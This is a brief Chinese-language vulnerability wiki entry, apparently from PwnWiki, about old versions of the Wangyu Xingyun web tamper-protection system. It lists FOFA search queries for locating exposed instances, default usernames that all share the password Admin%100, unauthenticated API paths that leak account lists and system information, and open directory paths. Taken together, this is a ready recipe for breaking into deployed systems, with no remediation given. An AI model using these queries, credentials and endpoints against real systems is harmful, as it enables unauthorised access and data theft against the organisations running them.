Loading
0

网御星云-网页防篡改系统古老版本多个漏洞/zh-hant

免费、自由、人人可编辑的漏洞库

,

影响版本

网御星云网页防篡改系统较古老的版本

FOFA

title = "网御web应用安全防护系统v3.0"
title = "网页防篡改系统"

弱口令

super(超级管理员)

admin(系统管理员)

operator(操作员)

viewer(审查员)

密码都是:Admin%100

未授权信息泄漏

URL+/API/

账号信息泄漏

URL+/API/user/list

系统信息泄漏

URL+/API/system_info/list

目录遍历

URL+/doc/
URL+/images/
URL+/audio/
URL+/fonts/

参考

https://short.pwnwiki.org/?c=WtUWOp

PWNWIK.COM